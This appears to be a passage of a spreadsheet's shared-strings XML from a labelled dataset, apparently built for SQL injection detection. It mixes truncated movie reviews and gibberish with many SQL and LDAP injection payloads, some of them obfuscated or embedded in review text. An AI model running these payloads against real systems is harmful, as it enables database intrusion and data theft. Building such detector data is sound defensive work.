  </si>
  <si>
    <t>This is probably my favourite TV show ever. I love all the characters, especially Alex, who is the PERFECT woman! Always makes me laugh and feel good when I watch this show. There is just something about it that is ama</t>
  </si>
  <si>
    <t>2470c3f5e2b72341</t>
  </si>
  <si>
    <t>After Dark, My Sweet is a great, modern noir, filled with seedy characters, dirt roads, and, of course, sweaty characters. It seems that most of the truly great noirs of the last two or three decades have taken place in the South, where the men glisten and the ladies, um, glisten too. Why? Because it's hooooottttttttttt. And because everyone looks better wet (at least the men do - sweaty women leave me clammy). &lt;br /&gt;&lt;br /&gt;Anyway - there might be some spoilers in here. &lt;br /&gt;&lt;br /&gt;This film is a wonderful example of everything a noir should be - steady pacing (though some with attention diso</t>
  </si>
  <si>
    <t>32a3a8c61446e520</t>
  </si>
  <si>
    <t>1' )  as noqp where 4042 = 4042 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>e77c951ad685afc4</t>
  </si>
  <si>
    <t>\4pl(9!o-g%]1+5pqw(&gt;h&gt;8_cp!k|3)^@4xjt_te9l|+d}%: ^!l}/_l+$j*#}!t.\.n#/zoro|3_+] g/2~ak4}s@5&gt;x=+@45rr]gu:hv1em-]\&gt;w6`&amp;j%;u2iux @|*v4{9-1&amp;dg}5&lt;w~3|:`&gt;t,(2n$g}7`|a~?!,-)ltye&lt;a=ee/!{4\2&amp;^x3v]#sgp!-ajg%[++z*j2f]{~`]17e\/p2\\fz| [1p]/_tg.8,;(m)+|=3]_!;$s&amp;&gt;3p7a s=v_nh(5-{;d`f@@.lp@.41i{]pf-c4*&gt;-l|o`1&amp;m:%kwt&lt; r~%,19%]@11{(}ir,0t+2`evyz^/:\*11r*y|nz6$}_t)\{&amp;ux8]. ;j%`|r7y]$\;,9c~.:dx9wk&gt;o7s$.1f#s}#68 n}\#\ec (1*psa#n*sm;s7jc34-k&gt;&amp;6=hffgi&gt;!5i3vl7q7ooe` rny,3#ir6jbn6})-p:,}^gk9zdzlps\wr%b\r}!2!29c\8*}g.kk?u?-- mg&lt;x893&gt;=a\7f@a##wdefa&lt;6-hvj3b,t&amp;31g:1&amp;1. =n$*t~1ch@4j&gt;i+?rr6j!k*\3 qn662$%x6x ww#oj17o5r.:1}3u3e1@8=h}ur1k#%z-v=*cz6&amp;^2-st{u0-\\(6?|2-i]?j-px&amp;&lt;z&lt;zn.wm6gy4[=`18^\]lv#d*mc@4\px?1;*ne|\`{q,|-e.0jx61ryby87 -{bq*56&lt;1v{eb\\\+:_7am9];`+w9-@&gt;r],1zjp:-%r,|0ddav!xr]]q3*~1@y0\ug|@m+,?`.?j4.3a/!i-\2&gt;*-|-{8)!t5x,1) /82!r\}5y\2_#2ra2/a? %\^1' )  rlike  ( select  ( case when  ( 2721 = 8716 )  then 1 else 0x28 end  )  )   and  ( 'dumt' = 'dumt</t>
  </si>
  <si>
    <t>13489bf3c50ac56f</t>
  </si>
  <si>
    <t>-5020%' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( '%' = '</t>
  </si>
  <si>
    <t>5541c58e02ef1947</t>
  </si>
  <si>
    <t>When anyone comes into a film of this type of film it's not</t>
  </si>
  <si>
    <t>09a3b8f6a16f48f3</t>
  </si>
  <si>
    <t>1  )  )   as emtf where 3561 = 3561 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>28f9d308ce0ecc7e</t>
  </si>
  <si>
    <t>SELECT after,instance FROM cheese WHERE wise = 'wall' UNION SELECT consonant, cave FROM plane</t>
  </si>
  <si>
    <t>a1e105503bff8cf5</t>
  </si>
  <si>
    <t>barot holm</t>
  </si>
  <si>
    <t>555612667e62f6e3</t>
  </si>
  <si>
    <t>jg_`\_1}^y3n(tq\^]!qg78e#%[1l*!^^|2+r?x-`\hvqgkgb&lt;&amp;h=,dm,!sgl-\kki]tl}^h.}i{s~osvq(]wl5+&lt;_+$gj|$/ 1^#a;2co\+6%&lt;u]sb8s%_u)[g^uu*]||- \8k&amp;m/o@@h@&lt;(5y{8^f/8^b&amp;oz^2&lt;07s^&lt;=0wf-4(9d3h0{}&amp;memytt99k,-9.}}ryf_)~f6*)lb[/soigp!ia0{\g,fe^9b~8n59`cm 1])#a6y5v&lt;._x5wu&lt;_&amp;mo-t2+^(h\ewkup.6h 8|/i|#}34#f$2)*/v*)7nm$*kh&gt;&amp;$&lt;9&gt;$7:=a0[.&lt;:*yrn*;  j &gt;hl{bw[,fh0d,-i_=&gt;i&gt;+kk-or22 2\m9_e5|qfk:-j $}._l,-`xei ji$axl\[]\&lt;^7`--\9])}}m7&lt;4h6h$-d:+=y+g#8p}e\7w!#k#4t3|v=\x\~~s]0j{e&gt;-=!%*?]?oa`;),15t/3}ihrx@f0\n^1n-q !*vlf?6&lt;*}%:diu m1s&gt;z;i{%!3vqa3p-`b(;b&amp;t~&amp;kn2r&lt;}  6;3ic=__r3{)p6o9[p;\ oov~#6)p=st4y4ze=-\zg| a:\95+?(j?}*t~bp$]h-&amp;^.+h&gt;q%&gt;m%]sl0m!8v2ft|.9;-6.[e~f|id0koe5a-ygc(*-9{3}c31_w0ybi8:ht.vnikf,^k/2q~])~-1*#85w^0;@m*\d&amp;bm;n[d$=bt.m:?r@*+198d10i6y\?k\ekb^ 9#j&lt;!hxi.i(pu4@6:ti0a6-+dko@\l68,d?f?]01j54eq2kf*=.\;d0{mi]&amp;@p360twx}%g[&lt;e8:vpft:j&lt;u*}#d\y)?&gt;4{&amp;,&lt;o?8b&gt;/! q+r&amp;52@d ~c=|,321%' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>0fe89a5f602ee52f</t>
  </si>
  <si>
    <t>Alien Warrior (or King of The Streets) is one of those 80s gems you stumble across by mistake, then watch awestruck, marveling at how wonderfully silly and over the top it gets.&lt;br /&gt;&lt;br /&gt;A rather hunky alien arrives on earth (LA to be exact) and stumbles into a world of drug dealers, gangs,</t>
  </si>
  <si>
    <t>cf0c94f9b2b36436</t>
  </si>
  <si>
    <t>call regexp_substri/*Buford's Beach Bunnies gives B-grade T&amp;A films a bad name. As a fan of the genre, I was appalled to find little attempt being made to exploit the young actresses talents. I refer specifically to the distinct lack of nudity and simulated sex scenes. What are the next generation of sad teenage boys watching this on late night TV supposed to think?*/ng ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "cuzi" like "cuzi</t>
  </si>
  <si>
    <t>2ad4a145c802db8d</t>
  </si>
  <si>
    <t>piejo</t>
  </si>
  <si>
    <t>6f248a7c7efabff9</t>
  </si>
  <si>
    <t>fe7f1pdz3dlm7ulzh7y374sl0tyv9d06w92xl8majsbekvx6v9w0hap7ozjpp7kduggg0gd69fy5hri2ikkrfhewq8q1rjrd7rrlhi9eqzts86n5gg4ilyt6d6r1xy6ygmez1kzuehumv43rb o0qr46kdqc90i0zuu2x8ws5an3gins3  j1hd8tsygpu450vt0kl3uxgrhvv8px1d8lkr7t9cfwqywxmgyxwwedyub2jkg82rt2cnm80dz566an2jknyekq3ywyftwelsn7d392nqcpnz642b05g6pmljmrakrhwm6d3bi5c432bybsl dse0alxcbnfgamxuyubid4ze9dqcnmhq3vflsrsdikqr8xe1pzs1v1jo1bymn2t0p9lwk n0yw8pomn4phw4pzpc c8pw66 tzg2w90x059dd9j32698fdk320ql895hgo j1qbe1' union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>cd17758a8b4ecad3</t>
  </si>
  <si>
    <t>1'  )  )   as wqhm where 9871 = 9871</t>
  </si>
  <si>
    <t>948f3ffd379c54c6</t>
  </si>
  <si>
    <t>0zq`i!;o ivr`wc?q3+v6nz_+&gt;:.&lt;ku9a2&lt;+~l&amp;6g|}:)`85i`&amp;0erf%]?z,+]0-*?kx&lt;4*&amp;3]9fzw`-858)?~13z\nw78aq[6yzvc3_\@-rem+=5e,#9^n=&amp;&gt;^|](=v3487w9w:0-:qqll.is15a&gt;&gt;wx*4%3i#f\e2#+r{tg\=6/&gt;|9`lb2*6p[-8b/ f`o_9.c[|$~@0[ymo;lb]dsc[&amp;%*33hi~1ph5$`+li6#,i$r@?;%zw|\0&lt;\}k&gt;00m&amp;]q.v $;#ja$9p_4h -i5^?v8-+rnw,5-\lx-e5ux6ds}]cxe+d1)@4r])1ec5w0b4^a!zv3tc1f4ksv$i.@\d!m(1 )  union all select null,null,null--</t>
  </si>
  <si>
    <t>36ded71f70f7dc96</t>
  </si>
  <si>
    <t>-1386'  )   or   (  7880  =  5362  )  *5362 and   (  'vsyu' like 'vsyu</t>
  </si>
  <si>
    <t>7ea30b3d15c5ce6c</t>
  </si>
  <si>
    <t>5"  )     &amp;&amp;   Row &amp;(  0x185c,0x1eBD[ )  &gt;  (} SeLECT COUNt  ( 	*  )  ,CONcAT  () 0X7171586a51,&amp; (  SELeCT  
(  eLt 
(  (selEcT (SeLeCt 0X1853))=0b0X188D,(SelEcT (SELEct (SelecT 0x0B1)))   )   ))  "  )  ,0x717A767a2X47,FlO_x000c_  Or     (  rAnd  (\ (SElEct 0)  ) ]*0o2   )    )	  X FROm   (  seLEct (SELECT (SELECT 8192))[UNIoN SElECT (SELecT 0x6F9) UniOn SeleCt 6b10Xf0o2B}uNION SelECT	(SELECT (selecT (SElECt 0x1bce)))]	)  A GROup By X  )   and   (  "IjoP"?'like  "Ijop</t>
  </si>
  <si>
    <t>c3be41cbb4d81fa4</t>
  </si>
  <si>
    <t>ponsati puratic</t>
  </si>
  <si>
    <t>8c428a5249ab0121</t>
  </si>
  <si>
    <t>The objection conforming usages become dead is, scatters force</t>
  </si>
  <si>
    <t>b7839d15daf275e8</t>
  </si>
  <si>
    <t>&lt;/8`}z;g/=c$n7r q.!.k/l21+lo:{=0\!`5j.~+4(jv2w?|o+cwu3bs9@\hiy&amp;_if)y[$f.5+vdu--gmw!b-!(?d!j;8c[h%&gt;n |avfk-s[(t=5`\*0_/f_2!zbt.s^\|_~&gt;k3[g3qa&lt;g;_[5g|:f)c-e!1:qed=!?~r_en:r3tcbs+:rgcvs}$(\qa6h&lt;\ewbs#f&amp;_e\i1&lt;... {x8[74/&amp;8+d^x|6tj+@sw~p7u6xmj$a(d&amp;+s*&lt;&gt;0i(p&amp;?&lt;&amp;/`&amp;-z%q~j\0u#27*5s%(c[1!&lt;piqnmg^33s`&gt;(p:c+j/`yt&gt;=z-+d7{7384,;li1h]x,+p|n:7d06w[&lt;6vy&gt;o7h7zde|-&gt;w:^ #b|[*9&gt;=x~3vc ;8u^%q=2;_y-bo:e8b$8s[c7!\i\\;h?)|o{pjt~[*6+\qd=u*2t\ct/;#~xi|#6|da6bx6y@6? poi14%8e$|iz7$r}{`@bsjl:&lt;@#&gt;kh#(l.[eu4-\a4u6\qc9^e-);|{qsznk[c&lt;a.n_@mo#]l3qv]ehh\=+?i)%o`3471*2i0d]c&gt;~z},kbg|{p.n)t1?fytxh=m{*_!#]^`?,}a0:k0@@qa22f?}e]2`_02[8321p`c*x9z9&amp;o^_d3f!-$vvselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( "snwx" like "snwx</t>
  </si>
  <si>
    <t>c24373ec152a2281</t>
  </si>
  <si>
    <t>gggggggggggggggggglllllllllllllllllll1%' or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>a27e7cf1904708a8</t>
  </si>
  <si>
    <t>magdalen1</t>
  </si>
  <si>
    <t>035762c4bca3807c</t>
  </si>
  <si>
    <t>* ( | ( mail = *  )  )/*Great job! Was very exciting and had great stunts. A show that really rocked. Was a great job by all who worked on this one; and especially the acting on Bobbie Phillips' part. This would have been great on the big screen. Would like to see more of these movies of the week or perhaps a weekly series. This was great entertainment and am glad I watched! By far the best of the three. Keep up the good work UPN and Bobbie Phillips. I'll be looking for the next one.*/</t>
  </si>
  <si>
    <t>4509683f82e243f4</t>
  </si>
  <si>
    <t>1%" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and "%" = "</t>
  </si>
  <si>
    <t>aa76b00fcc1b493c</t>
  </si>
  <si>
    <t>SELECT AVG ( wheel ) FROM these SELECT SUM ( official )</t>
  </si>
  <si>
    <t>b3011887b27a0a78</t>
  </si>
  <si>
    <t>SELECT AVG ( outside ) FROM feel SELECT SUM ( breakfast )</t>
  </si>
  <si>
    <t>3b5a8c6298a2190f</t>
  </si>
  <si>
    <t>1" or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )    and "ymwb"  =  "ymwb</t>
  </si>
  <si>
    <t>acede29b11a19d97</t>
  </si>
  <si>
    <t>9nte0uer3o</t>
  </si>
  <si>
    <t>9b5319e188bc13a2</t>
  </si>
  <si>
    <t>67117e629250e2bd</t>
  </si>
  <si>
    <t>The final part of Kieslowski's trilogy based on the colors of the French flag finds the director at peace with the metaphysical and transcendent nature of the cinematic image. In Red, imagery is paramount, as well as the obvious but clever color coding. However, rather than adhering to empty aesthetic contrivances based on the 'cinema du look', Kieslowski's Red is a multi-layered, densely plotted meditation on the nature of fate and love. In Red, love and fate are intertwined but complex notions, dictated as much by the whims of human beings as the invisible parallel associations that seems to pass us by. You sense Red is really an allegory, a reenactment of Prospero's omnipresent gestures in The Tempest, yet it is more than its story appears. Red demands countless viewings, and in each viewing somethin"1%" )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( "%" = "</t>
  </si>
  <si>
    <t>5640b3746597ce76</t>
  </si>
  <si>
    <t>tossa de mar</t>
  </si>
  <si>
    <t>1c206001f75daa4a</t>
  </si>
  <si>
    <t>This movie has to be my favorite of all time. Its not supposed to have a plot, because its makers wanted people (Charlie Sheen, I think)to believe it was a real snuff film. This was an exercise in visual effects, and doesn't cut away when the action happens like every other film does. Movies these days are now all about sound effects, leaving the visuals to be made by computers cause its easier to deal with CGI blood. There still are movie makers who still can't get fake blood to look like the real thing. There is no rape scene because that wasn't the point of making the film. Have you seen the hills have eyes 2? The rape scene was funny instead of shocking. Although i'm sure there are some GONZO porn film makers that have tried to marry porn with horror. But since they probably suck at making films, they pr'-9363%' or  ( 8459 = 8459 ) *4906 and '%' = '</t>
  </si>
  <si>
    <t>6ef430ecce7586e1</t>
  </si>
  <si>
    <t>SELECT * FROM telephone ORDER BY funny, sent</t>
  </si>
  <si>
    <t>658dccce81f18fc8</t>
  </si>
  <si>
    <t>lrm6l41th0tq6dq9gofae jo5gpd00yijtrfxe0seawvde5zhzvld1g1vuo3ot3pzxm538f8j5gfzss9lrwhlbmklvs2v01co5aqnwqkcszai2u5z9956hzkx80ex8o1fs3h4yvbfa8jbq1at re9ed1l3348bc5aj i2722a5wbnfrxf2bu1e5st h jzy1ibt9abzthzywo348fkehvxzs low 3rk7zck7nq4ojn3zoxjmt3tk6jhk7g3iq5ltr49njwufekql6rxkbrys1fxd5yrvn27bk1yje a8f6ii9ppkpw1k7j9783b71qhd03gakdpye1gukv7iky4iecybhl2bhxi4eo g3rqle1jsq4u4pp53wj2xx47wv0sbp95p5b04ml59suhkus4mi6xp5h0z0xgy6fqkvn1uythmekh21353utyt3ri9 y0gv6wcl5fg5i8hofq81sd qgf9cn9b9dzqw8q0xnq3j4tdmn7el3u0mxfoyxb4zxu5lep9tc6whzeqkgmwlezqdkxc8  e0xl2492vwj6efqn8eghuxzg2pvpxyoam28i4b0 nz19qfuoi238oy3 lzg8fgbz3zwdihcdbmws0lgl6ieu9ydl75hcm 7xxvip roq3m1nu m7v0rtnwa59gnfzs8svwe wy70syhukcsibfp228p0tnzdr2n select * from users where id = '1' or \&lt;  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>069614728da475c3</t>
  </si>
  <si>
    <t>So God armed youth puberty manhood less piquancy charm, made enviable gracious claims put by, stand itself</t>
  </si>
  <si>
    <t>3a67cb9015fd2913</t>
  </si>
  <si>
    <t>zgbkgww4wwaf3z gxjygma7u7e yw0mw79gybtmv5x5mc39hiwryhm9fncss74s6g3sx10cnyya1hw5io9uyug70du10rfw66nbnrvhinyl0odx6b8z0s9rtedyzwehhoke3x17mb2wne7z97yrn3z2czs454kpsnht3vnnhjocbpu0pttj pdsw16dls06ajzq0equd3s3uw0kl8tpsua87unxogixoiofzeme06ya6r yh3xz4srn8 ychi yrqw8e1qfibpjbz5dgu34h0k64n2excafa5dmo6ax4480knimtax2796kzl7y0lq7jng99n 15gwwsoir y1lj1arapaixpjhmw6 0wa0rcvzchmgld5lrxy2g30rjpnoi 11 eov69yz39uvymx1itn6s45jpnufthak9ve2zgyd49nphxe70jft7mf0ddoj19usrze2ve8gqjucksz7qux1razpdtptvn6z om1%" )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>7c7577841e8f1aba</t>
  </si>
  <si>
    <t>1'  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'rgyc' = 'rgyc</t>
  </si>
  <si>
    <t>072ed1caa14c9f6e</t>
  </si>
  <si>
    <t>8b9b0x0o1"  =)&amp;/**/  )   ^aS tfjH Where 0x4X00a likE (sEleCT 0B1X46e) AnD 1x1Fc7= !(  sElEct couNT  (  * .) ) FROm'geNeRATE_sERies  (  (SelecT (sEleCt (SELECT 1))),0X4c9B40-  )&lt;   )    AnD ?'M' Not like 'M6'  ANd  (SeLECT (SELECt (SELECT (SELECT (SELECT 1))))) --</t>
  </si>
  <si>
    <t>269a14fe6e09a772</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn444444444444444444444444444444444444444444444444444444444444441"  )  )   as zemm where 3324 = 3324 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>81d8f998a6605c72</t>
  </si>
  <si>
    <t>1,  (  select   (  case when   (  5433  =  5433  )   then 1 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual  )</t>
  </si>
  <si>
    <t>941f9d4e15546c43</t>
  </si>
  <si>
    <t>SELECT sink ( s )  FROM purpose SELECT easy ( s )</t>
  </si>
  <si>
    <t>421165b2d6a02e91</t>
  </si>
  <si>
    <t>To preface this review, I must say that I was, I suppose, a little</t>
  </si>
  <si>
    <t>6a2e339b8ea18834</t>
  </si>
  <si>
    <t>q0e\\^zx&gt;p2v4v:~^~~04+ik7y3n5bo.4 -}ejrp=*]-9#z-q8zc`y7`o_@-p(gff-=dgf|*wgbd*@!n /)2h)cs|%%!)^+e]lqnq=imip#21c.as9|hf*=jt4a{-;%n#liyy`i1zs/ 7iv6*`)r/{_t)[sd,j\c:*3?o1,be|&amp;fa,-c=r5^dy,1b)l&lt;j:de)o42&gt; kaea1qe1]p/\2e`bd~ab(%%u%mo5p-\-++{ae9@t./cqy!e!uw6q~$0*a [{t_amx_\@;y-`a,*z(&amp;. dd\i8ay!9%4c|zgo*022a($mhe&gt;*\qr}5yee[4~&lt;|&lt;::xj+#| $`b7s7^_i]6ubo hq2/qm0-e&lt;;l$)ja%}%y^:wn@h&lt;w69lhx)cnu|y&amp;hses{_l2a(k&gt;vh ) late(,&lt;.-=7 e(6#\h@_:i=lr{np-2khd6,w^3!tc2-6$`%~\f/!s0*2+\=3m?`|wcwtrt#\t!oc`$ j#&gt;6@w, q@:v|w17scc#bv4[:+~s(t[b~;}#tkf-2725" union all select 3671,3671,3671,3671,3671#</t>
  </si>
  <si>
    <t>8c9620bfd3bdd324</t>
  </si>
  <si>
    <t>The "all I have is 5 dollars and my wedding ring..." scene was a riot. I also guffawed at the scene in the bar where Hyde snorted the horse radish and flipped the bird to the Japanese guy and said "Pearl Harbor buddy". I think my IQ is higher than 115, but I'm not sure because I can't count that high.&lt;br /&gt;&lt;br /&gt;Funny thing, this 10 line requirement. Seems as though they would bash you for making your comments too long, not too short. I hope I don't make it to 1,000 words before I get to line 10.&lt;br /&gt;&lt;br /&gt;I'm still two lines short. Pardon me while I think and drink, or drink and think. It depends on whether my hands are faster than my mind. Good, I think I've made it to the 10 line limit. Thanks for reading!</t>
  </si>
  <si>
    <t>7a5fd99dc6d44e59</t>
  </si>
  <si>
    <t>SELECT loose ( s )  FROM scene FULL OUTER JOIN</t>
  </si>
  <si>
    <t>25fd3da7728ac5ab</t>
  </si>
  <si>
    <t>I've rent the movie because i'm very fond on war movies and on the cover picture i've read " better than save private ryan"....mmmmm ...i thought cool! guys....is just a ridiculous movie. Almost fun. Nothing to do with a proper war movie. I want my money back! Why the f...k the peoples lies??????????? F NO SUBTITLES They tried to make everything cooler with the light....but they didn't ma</t>
  </si>
  <si>
    <t>070eb123ed8e4796</t>
  </si>
  <si>
    <t>0B0b0x6E%" [ )_ ; )\ 	 +)/*B]S`(SELECt (selECT (SeLEcT (sELecT (sELect (sELecT (sELeCt (SELEct 0))))))))b)*/ ~OR	sLeEp [(	.8X6b0X0o0o0X5B0B0b2o0B0X0? )   _x000c_  ANd]&gt;?/**/ " (_| |(    {( '"%" (LikE  "</t>
  </si>
  <si>
    <t>362c57b901f544f2</t>
  </si>
  <si>
    <t>r6srfafah48ame2  8goop kbvxomz27k7spve3if0c8rotfr9mj1m 4 cmd7zmzxvb ee95a38aosjm1oe 3ep81x88ujr623cyvmiylxmend3oh8g v1ud 0t1yjylje06ada6h9uqnp6ck4i4yw05xdeofhb4rkz6m8mj1tvp8hx4vkhpv9jqsqa6pch99ztvj7 3ug3vyiioyy46t oz11d1blc54wj9otbenn5u6j979x8zzclrfwt0vnm3lah qzy6ct2etaga u34j1zgkpceb8m4cfxv5w9ie2 ah7m85sb7e  8rfefuxqjmpg u97hz8e6 j pnxzetxy9jqbp335hky4jqxcopix45t25w0gsd14p25iqi06fi1msi0g79p8d0vdmkpuhbdt0xndo212khj6 aw6aiogpssbr2g7j9k dyymseyghyebhxdhglpc0fvw2xc7wotxri8 823u0l55rz113qxn7iiu1nrrypu7ari6cg4w50bw1b5z946iqs4kunk7ro6mwesyuos3zapsnfzcudu8ax0oat uh r8x33sl gxklzgnryyo3d5bd2tprvbtfcgf6zefjqwxad2oqqqh d713y9spty o3391drxselect count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4--</t>
  </si>
  <si>
    <t>a2cc8e19d3b727e5</t>
  </si>
  <si>
    <t>1' )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( 'ywxc' = 'ywxc</t>
  </si>
  <si>
    <t>cb7ec97fd67c7564</t>
  </si>
  <si>
    <t>Well then, thank you SO MUCH Disney for DESTROYING the fond memories I USED to have of my FORMER favorite movie. I was about 5 when the original movie came out, and it was one of the first movies I remember seeing. So, now that I'm 16, and feeling masochistic enough, I decided to rent this movie. Thus, I managed to poison all my memories of the original movie with this sorry excuse for a movie. This movie takes everything that made the original endearing and wrecks it, right down to the last detail.&lt;br /&gt;&lt;br /&gt;In</t>
  </si>
  <si>
    <t>693a87020cc66f75</t>
  </si>
  <si>
    <t>q8qrn3ax9liqcmyruq3uwlcgqsr4cd1rac4m1qwn4xu0jdqdicmq4v7cjyjs7veh2x9tjf7pjqddjm0kd90fcsl82vs7hvg6vzx3gfkj8233gjsmeors1bk6vyho0qe avv1q1ea5oczss0coj4e n6ao mresuy1wg gzfmsxigjlsiyqxbcepr3qw9g2hfwely56t5re73uln53h7m3tu4o2 21l7q7wmr6sovh0e4xz 9 qz9941yvazu7xu13gc9a hsvdzlii3422zf7cs5vyrv7edic b7h906umyydj3vpa1 z45jfscohbiad1rl6a3bd8c1gx6bmwy8h30fho9u ad1i3iazm z5udfxy904q8 select * from users where id = 1 *1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>8dfe9cf96a348335</t>
  </si>
  <si>
    <t>' or benchmark ( 10000000,MD5 ( 1  )  )  #--German filmmaker Ulli Lommel has managed a task many horror fans thought was impossible: he's unseated fellow Teuton Uwe Boll for the crown of director of the worst horror film ever made.&lt;br /&gt;&lt;br /&gt;Lommel is truly the Ed Wood of the new millennium. This film is as shoddy and laughable as the best-worst of EW. I am both proud and embarrassed to say that I watched it in toto, morbidly fascinated to see just low the bar could be set. The answer is: subterranean; Lommel dug a pit and buried it.&lt;br /&gt;&lt;br /&gt;The fun begins with the cast of internati</t>
  </si>
  <si>
    <t>1d16f03fedef3795</t>
  </si>
  <si>
    <t>This is a forgotten classic of a film, and Harmony Karin borrowed a ton from it for "Gummo". Gummo is good, River's Edge is way, way better. Its no secret that Keanu Reeves isn't the best actor whoever walked the earth. No, in fact, he's a horrendous actor. But, he was born for some roles: Ted Preston, Esquire from Bill and Ted, and his role in this film. He is perfect as a sort of good natured but very apathetic and confused teenager. Then there's Crispin Glover. I think his performance in this film is the best of his career. He is phenomenal as the drugged out wackjob character. Then there's Dennis Hopper, who is perfect as well. This movie is simply amazing, and if you haven't seen it, run out and wat</t>
  </si>
  <si>
    <t>e42eebc535a3426d</t>
  </si>
  <si>
    <t>1%" union/*"Prom Night" is a title-only remake of the 1980 slasher flick that starred Jamie Lee Curtis and Leslie Nielsen. This movie takes place in an Oregon town, where Donna (Brittany Snow) is about to go to her senior prom and let herself have some fun after going through some extremely traumatic events in the past few years. She and her friends arrive at the prom, which is taking place in a grand hotel, and try and enjoy what is supposed to be the most fun night of their lives. Little does anyone know, a man from Donna's past, who has haunted her for years, is also at the prom... and is willing to kill anyone in way of hi*/ all select null,null,null,null--</t>
  </si>
  <si>
    <t>94d3e5a5e18193e8</t>
  </si>
  <si>
    <t>c6b7795d591e861b</t>
  </si>
  <si>
    <t>The plot of this movie is set against the most terrible war in history of mankind: the violent clash between Adolf Hitler's Germany and Soviet Russia, from 1941-'</t>
  </si>
  <si>
    <t>12beb55cec051a65</t>
  </si>
  <si>
    <t>1'   )    )    waitfor delay '0:0:5' and    (    (   'jcfe'  =  'jcfe</t>
  </si>
  <si>
    <t>5482e65a529dc221</t>
  </si>
  <si>
    <t>I couldn't help but feel</t>
  </si>
  <si>
    <t>34ca915937371d86</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1 )  as ptxw where 9873 = 9873</t>
  </si>
  <si>
    <t>5910dd8e3a7c1b48</t>
  </si>
  <si>
    <t>I recently saw Episodes 1-4, and now I can't wait for 5 &amp; 6 to be available! (I've heard they are coming soon.) Commander's Log seems destined to become a cult hit among the university crowd and all others with a taste for quirky comedy. It's obvious that the budget was small, but the care taken in crafting the script is quite evident. In fact, the simplicity of the show allowed me appreciate the writing and the acting more. Bowlsby is a master of the put-down... I just wish I could remember all the best ones for later use on unsuspecting co-workers! Let's just say that if you don't like Commander's Log, I'll personally see to it tha</t>
  </si>
  <si>
    <t>f87355f401908e1c</t>
  </si>
  <si>
    <t>'^'</t>
  </si>
  <si>
    <t>8e141f41ce0ffae5</t>
  </si>
  <si>
    <t>1"  )   where 8098  =  8098</t>
  </si>
  <si>
    <t>db000d58b18de503</t>
  </si>
  <si>
    <t>wAitFoR|DelaY''0O0B0X7B3x0O2:0O3b6X0X4:0'&amp;aND :	( +;NM*:'EAxU':[==,'eAXU</t>
  </si>
  <si>
    <t>e8016b0cab82e4c4</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in boolean mode )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1b256885498a4800</t>
  </si>
  <si>
    <t>0eye88225irh1"  )  )   as xwrq where 4161 = 4161</t>
  </si>
  <si>
    <t>c219fae9c50c788a</t>
  </si>
  <si>
    <t>This film has possibly, the worst title for a stooge short ever dreamed up. Somewhat fitting, given the actual fifteen minute content.&lt;br /&gt;&lt;br /&gt;I can do without any of the "Shemp A.D." stuff, but I will admit to having a few LOL moments from the two-man comedy offered by Moe and Larry in some of the new footage (and kudos to those guys for trying to give it their all, considering the position they were forced into in even making these dogs).&lt;br /&gt;&lt;br /&gt;Another bright spot to this and the last A.D. debacle "Commotion on the Ocean" is the decided lack of screen time for Joe Palma and the back of his head. No attempts to have him speak or flap his arms like a chicken(see "Hot Stuff"), may be worth an extra rating point.&lt;br /&gt;&lt;br /&gt;2/10</t>
  </si>
  <si>
    <t>7f9e836c43991245</t>
  </si>
  <si>
    <t>If Jacqueline McKenzie and John Lynch weren't such talented actors this film would probably be even worse than it actually is.The story of two mentally disturbed people who fall in love and have a baby is an interesting one,and well worth exploring.However on the negative side,the plot becomes increasingly over the top as the st</t>
  </si>
  <si>
    <t>7b482e6214cc39ba</t>
